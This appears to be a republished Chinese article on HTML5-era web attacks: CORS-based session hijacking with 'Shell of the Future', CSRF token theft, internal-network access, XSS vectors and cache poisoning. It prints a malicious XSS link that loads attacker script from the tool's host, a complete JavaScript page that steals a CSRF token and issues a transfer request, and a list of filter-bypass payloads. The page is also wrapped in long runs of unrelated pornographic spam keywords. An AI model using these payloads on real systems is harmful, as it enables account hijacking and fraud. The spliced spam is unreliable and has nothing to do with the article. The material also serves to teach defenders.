精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

揭密HTML5帶來的攻擊手法

安全 應用安全
本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

HTML5 是下一代的HTML,HTML5賦予網頁更好的意義和結構。更加豐富的標簽將隨著對RDFa的,微數據與微格式等方面的支持,構建對程序、對用戶都更有價值的數據驅動的Web。基于HTML5開發的網頁APP擁有更短的啟動時間,更快的聯網速度。本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

揭密HTML5帶來的攻擊手法 

一、CORS(Cross-Origin Resource Sharing) 跨域資源共享

為了構建高品質的網站,以及滿足日益增長的用戶需求,HTML5針對SOP(同源策略)放寬了一些限制,簡單的說,同源策略允許來自同一站點的頁面訪問其頁面的方法和屬性等,但限制了跨域調用其他頁面的方法和屬性。現在HTML5放寬了這些限制,XMLHttpRequest Level 2新增了功能CORS協議,允許Ajax發起跨域的請求,瀏覽器是可以發起跨域請求的,比如你可以外鏈一個外域的圖片或者腳本。但是Javascript腳本是不能獲取這些資源的內容的,它只能被瀏覽器執行或渲染。

COR是頁面層次的控制模式。每一個頁面需要返回一個名為‘Access-Control-Allow-Origin’的HTTP頭來允許外域的站點訪問。你可以僅僅暴露有限的資源和有限的外域站點訪問。在COR模式中,訪問控制的職責可以放到頁面開發者的手中,而不是服務器管理員。當然頁面開發者需要寫專門的處理代碼來允許被外域訪問。

所以只要b.com允許,a.com可以使用ajax獲取A上任意數據,國外安全研究者Lava Kumar開發了一款工具“Shell of the future”。

Shell of the Future 是一個反向Web Shell處理工具(Reverse Web Shell handler)。利用跨站腳本攻擊或瀏覽器地址欄注入javascript以后,Shell of the Future可進行劫持會話。 它利用了HTML5支持的Cross Origin Requests,可以繞過一些反會話劫持的方法,如HTTP-Only限制的cookie,幫定IP地址的會話ID。

下載地址

如何使用該工具:

1、下載并解壓該工具,雙擊“Shell of the Future.exe”,會彈出一個窗口。

揭密HTML5帶來的攻擊手法

 

2、輸入任意端口,點擊“Start”。

3、使用瀏覽器訪問http://127.0.0.1:8008/sotf.console (firefox效果最佳)

4、不出問題,你將看到以下畫面。(Shell of the Future有兩個JavaScript的exp- e1.js和e2.js,我們可以利用XSS漏洞將其嵌入到受害者的瀏覽器)

揭密HTML5帶來的攻擊手法

 

5、當一個用戶登錄下面的測試網站:

http://www.testfire.net/bank/login.aspx (admin/admin)

該站點的搜索功能粗在一個XSS漏洞,http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

6、攻擊者發送一個惡意鏈接給用戶,如下:

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

7、當用戶點擊之后,攻擊者的IP地址將會發送給攻擊者,然后點擊“Hijack Session”:

揭密HTML5帶來的攻擊手法 

8、點擊Hijack Session之后,將出現如下畫面:

揭密HTML5帶來的攻擊手法 #p#

二、竊取CSRF令牌(token)

目前很多互聯網站點都在使用token來防御CSRF攻擊,但是隨著HTML5技術的普及,攻擊者很有可能竊取到CSRF的token,如果CSRF token的請求URL(GET請求),利用前面提到的CORS協議,攻擊者可以注入一個CSRF payload跨域請求到目標站點上。當然,利用的話需要服務端添加一個HTTP 頭字段“origin”,并且需要設置該屬性withCredentials為true,讓我們來看看如何利用:

1、某用戶登錄www.bank.com。

2、假設該站點有CSRF保護,即在表單提交的地方添加了隱藏的token,然后發送GET請求到服務端進行驗證,如下:

揭密HTML5帶來的攻擊手法

3、攻擊者通過email、IM聊天工具或其他方式發送一個惡意站點ww.attackersite.com4、攻擊者可以提交一個Ajax請求到www.bank.com并且執行一些操作,但是需要知道CSRF的token值。5、所以攻擊者需要竊取到token令牌,然后進行CSRF攻擊。

6、攻擊者編寫了下面的一段代碼,發送Ajax請求到ConfirmTransfer.jsp頁面并接受其響應,在返回的數據包中搜索csrfToken,找到后,另外一個Ajax請求被發送,其中包含了CSRF token。

<!DOCTYPE html><html><head><script>function testing(){var xmlhttp;if (window.XMLHttpRequest)
  {
  xmlhttp=new XMLHttpRequest();
  }else
  {
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.open("GET","http://bank/Myapp/ConfirmTransfer.jsp",false);
xmlhttp.send();if(xmlhttp.status==200){var str=xmlhttp.responseText;var n=str.search("csrfToken");var final=str.substring(n+18,n+28);var url = 
"http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&amp;
Account=1234&amp;csrfToken=" + escape(final);
xmlhttp.open("GET", url, true);
xmlhttp.send();}}</script></head><body onload="testing();"></body></html>

以上的一切操作全在后臺進行,用戶完全不知情,因此,在HTML5中,攻擊者完全可能獲取到CSRF TOKEN和執行一些操作。#p#

三、訪問內部服務器:

很多互聯網公司除了有ONLINE對外的業務之外,在內部也用著很多的應用,如財務管理系統、員工管理系統以及其他的一些內部社區等,很多開發者為了各個應用之間調用簡潔方便,在很多應用中都添加了以下頭:

Control-Allow-Origin: *

攻擊者可以利用社會工程學,讓內部用戶點擊一個鏈接,然后攻擊者就可以訪問到內部的一些資源,以下為操作步驟:

1、員工登錄到內部的某應用,如www.internalurl.com

2、internalurl服務器返回的響應頭設置了Access-Control-Allow-Origin: *(允許任何域發起的請求都可以獲取當前服務器的數據。)

3、員工受到一封郵件,點擊了鏈接 – www.malicioussite.com

4、這個站點包含了正常的UI內容,所以員工一般不會察覺,但是,該頁面包含了一段javascript代碼。

5、該javascript代碼會發送一個XMLHttpRequest請求。

6、分析返回的數據包,并把它發送到攻擊者的服務器。

7、攻擊者獲取到公司內部站點的相關信息。#p#

四、HTML5新的XSS攻擊載體

直到現在,還有很多開發者總喜歡開發自己定義的XSS黑名單過濾器,以阻止XSS攻擊,包含了大多網絡上常見的XSS利用的代碼,如img、script等,HTML5中引入了很多新的標簽屬性,如audio和vedio標簽,新的標簽帶來了新的事件,會繞過現有的過濾器,以下為收集的HTML5存在跨站的標簽:

<video> <source onerror=”javascript:alert(1)”><video onerror=”javascript:alert(1)”><source><audio onerror=”javascript:alert(1)”><source><input autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”

五、離線Web應用緩存中毒:

大部分瀏覽器都支持HTML離線緩存技術,如Google Chrome, Mozilla, Opera以及Safari,在給用戶帶來便捷的同時,也引發了一些列的安全威脅,如很有可能遭受“緩存中毒”的攻擊。如果攻擊者在網站上嵌入特定的JS文件,能夠控制用戶的賬戶。HTML5提供了manifest功能,它是html5提供的離線web應用解決方案,它的作用有兩個:

1. 連網情況下,訪問使用manifest的頁面時(之前曾經訪問過),會先加載一個manifest文件,如果這個manifest文件沒有改變,頁面相關的資源便都來自瀏覽器的離線緩存,不會再有額為的網絡請求,從而大大提高頁面相應時間

2. 斷網時,在瀏覽器地址欄輸入頁面url,仍然能夠正常顯示頁面,以及正常使用不依賴ajax的功能

利用這個功能,攻擊者可以竊取用戶的憑據,利用方法如下:

1、某黑木耳在星巴克鏈接到了一個不安全的WI-FI網絡環境。(攻擊者打造)

2、該黑木耳登錄新浪微博,攻擊者可劫持。

3、攻擊者設置該網站返回一個頁面,該頁面包含了一個隱藏的iframe,提示新浪微博登陸。

4、由于該網絡是由攻擊者控制,所以他提供的新浪微博登陸頁面中包含了manifest屬性,除了可以當場劫持到黑木耳的微博帳號密碼之外,后面還可以長期劫持。

5、當黑木耳喝完老干媽牌拿鐵之后,拿著心愛的神舟牌筆記本回家之后,想繼續曬自己的照片,繼續登錄微博。

6、瀏覽器會從緩存中載入偽造的登錄頁面。

7、帳號密碼隨后會發送到攻擊者。

因此,通過manifest屬性可以竊取用戶的憑據,以上都是一些已經研究出來的攻擊手法,相信隨著HTML5的高度發展,未來幾年內會出現更多的攻擊手法。

原文地址:http://resources.infosecinstitute.com/demystifying-html-5-attacks/

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-09-11 10:57:58

HTML5

2012-07-26 10:40:38

HTML5

2010-08-11 09:43:54

FlexHTML5

2012-06-05 10:48:23

2012-09-21 10:01:56

HTML5JS資訊

2012-05-21 10:05:10

HTML5

2013-01-24 10:26:04

HTML5HTML 5HTML5的未來

2014-08-26 10:54:20

2011-05-13 17:36:05

HTML

2023-03-16 09:00:00

HTML5HTML語言

2013-01-04 13:39:51

2013-01-04 13:30:04

2013-01-04 11:22:12

2013-01-04 11:40:54

2019-05-13 10:42:53

2010-08-30 11:55:28

2013-10-21 15:24:49

html5游戲

2011-12-08 10:59:07

2013-01-04 11:38:35

2013-01-04 13:14:22

點贊
收藏

51CTO技術棧公眾號

中国一级片在线观看| 中国丰满人妻videoshd| 国产视频在线观看视频| 欧美精品不卡| 国产午夜精品麻豆| 午夜免费一区二区| 成人在线观看亚洲| 成人一级视频在线观看| 国产精品高清免费在线观看| 91在线播放观看| 要久久爱电视剧全集完整观看| 欧美日韩另类一区| 国产3p露脸普通话对白| 91在线高清| av一区二区三区在线| 国产精品视频在线播放| 久久久久黄色片| 成人三级视频| 亚洲国产一区自拍| 亚洲高清视频免费| 成人午夜精品| 午夜电影一区二区| 色呦呦网站入口| 欧美成熟毛茸茸| 国v精品久久久网| 国产精品偷伦免费视频观看的| 国产奶水涨喷在线播放| 91精品久久久久久久蜜月| 亚洲欧洲xxxx| 性久久久久久久久久久| 欧美日韩中出| 欧美三级电影在线观看| 2022亚洲天堂| 91九色国产在线播放| 一区二区三区**美女毛片| 性欧美.com| 毛片网站在线| 91蝌蚪porny九色| 国产女主播一区二区| 在线观看毛片网站| 日本欧美大码aⅴ在线播放| 性视频1819p久久| 国产精品suv一区二区69| 亚洲91久久| 久久国产一区二区三区| 特级西西人体高清大胆| 精品美女视频| 亚洲精品少妇网址| 中文字幕影片免费在线观看| 国产精品2023| 亚洲大胆人体av| 波多野结衣办公室双飞| 超碰精品在线观看| 精品国产网站在线观看| 精品久久久久久无码人妻| 日韩一区二区三区色| 欧美一区二区视频在线观看 | 久cao在线| 国产精品久久久久久久久久久免费看 | 欧美一站二站| 中文字幕日韩精品有码视频| 蜜桃av乱码一区二区三区| 国产欧美日韩视频在线| 这里只有精品久久| 天天色影综合网| 欧美人与禽猛交乱配视频| 久久成人这里只有精品| 一区二区在线观看免费视频| 女人天堂亚洲aⅴ在线观看| 色综合久综合久久综合久鬼88| 欧美精品一区二区成人| 伊人影院久久| 国产不卡视频在线| 亚洲天堂手机版| 成人综合在线视频| 久久伊人一区| www.亚洲.com| 亚洲免费伊人电影| 午夜免费福利小电影| 亚洲成人短视频| 欧美肥妇毛茸茸| www.四虎在线| 禁果av一区二区三区| 久久精品国产免费观看| 国产精品成人aaaa在线| 视频一区欧美日韩| 亚洲一区二区久久久久久久| 少妇又色又爽又黄的视频| 久久久噜噜噜久久人人看| 亚洲一一在线| 国产传媒在线| 欧美人与z0zoxxxx视频| 少妇极品熟妇人妻无码| 欧美女王vk| 欧美日本在线视频中文字字幕| 日韩精品久久久久久久| 日本亚洲欧美天堂免费| 91久久精品国产91久久性色tv| 亚洲av无码一区二区乱子伦| 91捆绑美女网站| 久久福利一区二区| 国产综合色激情| 亚洲第一综合天堂另类专| 国产精品免费无码| 亚洲高清激情| 国产在线观看精品| 日本大片在线观看| 亚洲综合视频网| 欧美男女交配视频| 亚洲传媒在线| 欧美激情在线一区| 一本色道久久综合无码人妻| 99精品热视频| www.激情网| 国产亚洲欧美日韩精品一区二区三区| 精品国产不卡一区二区三区| 国产精品无码无卡无需播放器| 亚洲精品女人| 99精彩视频| 欧美另类极品| 欧美无人高清视频在线观看| 中文字幕在线播放一区| 欧美激情91| 国产在线视频91| 电影在线一区| 色婷婷av一区| 日本aaa视频| 亚洲人成高清| 粉嫩高清一区二区三区精品视频| 在线免费观看黄色| 91成人在线精品| 国产 中文 字幕 日韩 在线| 国产精品久久| 91九色视频在线观看| 欧美日韩xx| 欧美精品vⅰdeose4hd| 妖精视频在线观看免费| 日韩精品三区四区| 欧美日韩电影一区二区三区| 国产社区精品视频| 亚洲国产精品成人精品| 国产午夜小视频| 成人免费黄色大片| 精品少妇在线视频| 一区二区在线视频观看| 欧美—级高清免费播放| 韩国av永久免费| 亚洲第一搞黄网站| 国产黄色三级网站| 日韩午夜av| 久久艳妇乳肉豪妇荡乳av| 中国字幕a在线看韩国电影| 亚洲精品久久久久久久久久久久久| 国产一级在线免费观看| 成人激情av网| 成人综合视频在线| 亚洲桃色综合影院| 国产精品狠色婷| 一区二区三区视频在线观看视频| 欧美亚洲愉拍一区二区| 亚洲aaa视频| 国产综合久久久久影院| 国产精品av免费观看| 国产精品男女| 欧美做受高潮电影o| 国产1区2区3区在线| 欧美日韩综合在线免费观看| www.黄色com| 国产成人av电影在线播放| 国产极品尤物在线| 国际精品欧美精品| 国产日韩av在线播放| 91麻豆免费在线视频| 亚洲精品一区二区三区香蕉| 可以在线观看av的网站| 中日韩av电影| 三大队在线观看| 国产精品久久久免费| 日韩国产精品一区二区| 精品国产亚洲一区二区三区大结局 | 欧美日韩国产在线播放网站| 国产又黄又爽又无遮挡| 99re在线视频这里只有精品| 激情内射人妻1区2区3区| 91久久久精品国产| 精品国产综合久久| 国产成人精品一区二区三区在线 | 五月婷婷综合色| 欧美三级一区| 国产精品∨欧美精品v日韩精品| 日本成人网址| 亚洲精品国产精品久久清纯直播 | 久久精品美女视频| 欧美国产日韩亚洲一区| 久久无码专区国产精品s| 久久高清一区| 日韩久久久久久久久久久久| 九九久久成人| 高清一区二区三区视频| 成人精品国产亚洲| 国外色69视频在线观看| 黄色网在线播放| 亚洲精品视频中文字幕| 国产高清在线免费| 欧美亚洲国产一区二区三区| 国产无套内射又大又猛又粗又爽| 国产精品福利影院| 97超碰在线免费观看| 成人在线综合网站| 91女神在线观看| 先锋a资源在线看亚洲| 男人添女人下部视频免费| 成人羞羞视频在线看网址| 国产伦精品一区二区三区视频黑人| 日韩av懂色| 国产成人久久久精品一区| 高清电影在线免费观看| 超碰97人人做人人爱少妇| 国产精品无码2021在线观看| 亚洲国产精品久久久久久| av片免费播放| 欧美男生操女生| 中文字幕在线2018| 色噜噜狠狠色综合欧洲selulu| 日韩成人高清视频| 亚洲综合一区在线| 久久久久99精品成人片试看| 日本一区二区动态图| 伊人网伊人影院| 久久综合色鬼综合色| 性欧美丰满熟妇xxxx性久久久| 国产精品综合二区| 一级黄色片在线免费观看| 久久99国产精品久久| 亚洲 欧美 另类人妖| 日韩和的一区二区| 国产精品无码av无码| 免费在线亚洲| 欧美极品欧美精品欧美| 一区二区三区精品视频在线观看| 青春草国产视频| 精久久久久久| 日本福利视频一区| 亚洲精品1区| 日韩a∨精品日韩在线观看| 亚洲三级网站| 乱妇乱女熟妇熟女网站| 亚洲在线观看| 已婚少妇美妙人妻系列| 玖玖在线精品| 国产精品视频中文字幕| 久久国产精品99久久人人澡| 91精品999| 国产盗摄女厕一区二区三区| 亚洲av午夜精品一区二区三区| 国产一区二区不卡在线| 红桃视频一区二区三区免费| 国产精品亚洲一区二区三区妖精 | 成人小视频在线看| 日本欧美一区二区在线观看| 午夜在线观看av| 国产一区二区在线看| 午夜视频在线免费看| 成人av电影在线播放| 无码熟妇人妻av| 18成人在线观看| 久久精品波多野结衣| 午夜av一区二区三区| 丁香社区五月天| 欧美精品一级二级| 亚洲精品成人电影| 精品无人区太爽高潮在线播放| 高清中文字幕一区二区三区| 日韩亚洲国产中文字幕| 日本在线视频www鲁啊鲁| 26uuu久久噜噜噜噜| 日本久久二区| 国产一区二区不卡视频| 欧美色就是色| 国产aaa免费视频| 日韩高清一区在线| ass极品水嫩小美女ass| 久久久久88色偷偷免费| 黄色一级大片在线免费观看| 亚洲成人午夜影院| 亚洲中文无码av在线| 日韩午夜在线影院| 久久手机免费观看| 欧美成人午夜剧场免费观看| 免费看男女www网站入口在线| 国产精品日韩精品| av成人综合| 亚洲色图自拍| 夜夜精品视频| 欧美日韩理论片| 久久精品欧美日韩| 国产一级一片免费播放放a| 欧美亚洲国产一区在线观看网站 | 99综合电影在线视频| 国产7777777| 欧美日韩国产精品一区二区不卡中文| 伊人免费在线观看高清版| 亚洲国产精久久久久久久| 日韩在线免费电影| 欧美野外猛男的大粗鳮| 精品入口麻豆88视频| 欧美午夜精品理论片a级大开眼界| 欧美天堂亚洲电影院在线观看| 亚洲欧美另类动漫| 91日韩精品一区| 国产一级在线播放| 欧美一区二区三区免费大片| 成年人视频在线观看免费| 91精品国产高清| 亚洲性视频在线| 欧美一级黄色录像片| 男男视频亚洲欧美| 亚洲 小说 欧美 激情 另类| 亚洲午夜久久久久中文字幕久| 亚洲一区 中文字幕| 亚洲男人天堂久| 蜜桃视频m3u8在线观看| 国产精品xxx在线观看www| 亚洲国产不卡| 手机在线国产视频| 中文一区一区三区高中清不卡| 黄色片中文字幕| 亚洲精品久久久久久久久久久| 男女在线视频| 国产99视频精品免费视频36| 忘忧草精品久久久久久久高清| 搡女人真爽免费午夜网站| 久久久久久久久免费| 一级黄色免费网站| 日韩黄色av网站| 在线能看的av网址| 欧美一级日本a级v片| 欧美亚洲视频| 99久久久久久久久久| 欧美视频13p| 青青草视频在线免费观看| 97成人超碰免| 夜夜春成人影院| 欧美日韩一区二区在线免费观看| 91女厕偷拍女厕偷拍高清| 日韩久久中文字幕| 亚洲欧美日韩天堂一区二区| 桃花岛成人影院| 亚洲欧美99| 国内精品久久久久影院薰衣草| av成人免费网站| 精品少妇一区二区| 爱啪视频在线观看视频免费| 久久99精品久久久久久久青青日本 | 中文字幕一区二区三区免费看| 亚洲视频在线观看免费| av成人亚洲| 综合网五月天| 国产91色综合久久免费分享| 你懂的国产视频| 亚洲欧洲黄色网| 亚洲国产精选| 国产成a人亚洲精v品在线观看| 成人av在线网站| 免费污污视频在线观看| 综合136福利视频在线| 国产精品毛片无码| 丝袜人妻一区二区三区| 久久丝袜美腿综合| 在线播放一级片| 欧美精品第一页在线播放| 影视先锋久久| 在线播放黄色av| 大伊人狠狠躁夜夜躁av一区| shkd中文字幕久久在线观看| 亚洲一区二区三区xxx视频| 亚洲视频一区| 国产jk精品白丝av在线观看| 欧美精品三级日韩久久| 成人av影院在线观看| 色噜噜狠狠色综合网| 国产成人亚洲综合色影视| 欧美h在线观看| 久久精品国产综合| 久久aimee| 三级在线视频观看| 亚洲电影在线播放| 91亚洲精选| 国产精品亚洲一区| 免费在线观看日韩欧美| 久久亚洲av午夜福利精品一区| 亚洲人成网站色ww在线| 国产情侣一区在线| 免费黄色特级片| 亚洲一区免费在线观看| av电影在线观看网址| 韩国成人一区| 国产一区不卡在线| 不卡av电影在线| 97免费视频在线|